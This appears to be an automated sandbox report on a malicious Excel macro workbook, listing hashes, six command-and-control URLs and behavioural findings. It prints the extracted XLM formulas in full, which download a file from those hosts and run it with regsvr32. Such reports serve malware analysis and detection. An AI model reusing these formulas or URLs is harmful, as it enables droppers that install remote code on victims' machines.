Overview

overview

10

Static

static

10

2e77cdf05a...e.xlsm

windows7-x64

10

2e77cdf05a...e.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    2e77cdf05ad44ccd326db60a29e5141f366c06b74c7d5efc3d9ce97596afd15e

  • Size

    46KB

  • Sample

    241120-qzkejsxcjg

  • MD5

    bc00302b829243d357d9635c4564d4fd

  • SHA1

    b41fd9c7f89f49f0fae10115b4a708da38ad1682

  • SHA256

    2e77cdf05ad44ccd326db60a29e5141f366c06b74c7d5efc3d9ce97596afd15e

  • SHA512

    98e90f8f9fe683c50e5b87ef2082c8775038e1e90f0c11942cafc8a327abd068fdd5e388000816bf4ac4dfb1525d7fc8b1f7008c23eec42135b3a16d805b4c0a

  • SSDEEP

    768:lF0oGDOevZCwrvtq+9zdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+Uh0VU2j3l:j0oGDttT5fTR4Lh1NisFYBc3cr+UqVU+

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://izdehar-alwatan.com/coupled/dqQ6kPEWHFfX/

http://demo.techopesolutions.com/strepsipteron/r9Eq68FJ/

http://bioinvsync.com/Boster/GgfcVHKCNEWlq/

http://shamsalnubalaa.com/wp-content/NPX/

http://www.al-khora-contracting.com/hyphenization/ZvfA5SvD/

http://alataa-aljadeed.com/wp-content/J5NwCPmjSppx/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://izdehar-alwatan.com/coupled/dqQ6kPEWHFfX/","..\enu.ocx",0,0) =IF('EFALGV'!D10<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://demo.techopesolutions.com/strepsipteron/r9Eq68FJ/","..\enu.ocx",0,0)) =IF('EFALGV'!D12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bioinvsync.com/Boster/GgfcVHKCNEWlq/","..\enu.ocx",0,0)) =IF('EFALGV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://shamsalnubalaa.com/wp-content/NPX/","..\enu.ocx",0,0)) =IF('EFALGV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.al-khora-contracting.com/hyphenization/ZvfA5SvD/","..\enu.ocx",0,0)) =IF('EFALGV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://alataa-aljadeed.com/wp-content/J5NwCPmjSppx/","..\enu.ocx",0,0)) =IF('EFALGV'!D20<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\enu.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://izdehar-alwatan.com/coupled/dqQ6kPEWHFfX/

Targets

    • Target

      2e77cdf05ad44ccd326db60a29e5141f366c06b74c7d5efc3d9ce97596afd15e

    • Size

      46KB

    • MD5

      bc00302b829243d357d9635c4564d4fd

    • SHA1

      b41fd9c7f89f49f0fae10115b4a708da38ad1682

    • SHA256

      2e77cdf05ad44ccd326db60a29e5141f366c06b74c7d5efc3d9ce97596afd15e

    • SHA512

      98e90f8f9fe683c50e5b87ef2082c8775038e1e90f0c11942cafc8a327abd068fdd5e388000816bf4ac4dfb1525d7fc8b1f7008c23eec42135b3a16d805b4c0a

    • SSDEEP

      768:lF0oGDOevZCwrvtq+9zdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+Uh0VU2j3l:j0oGDttT5fTR4Lh1NisFYBc3cr+UqVU+

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks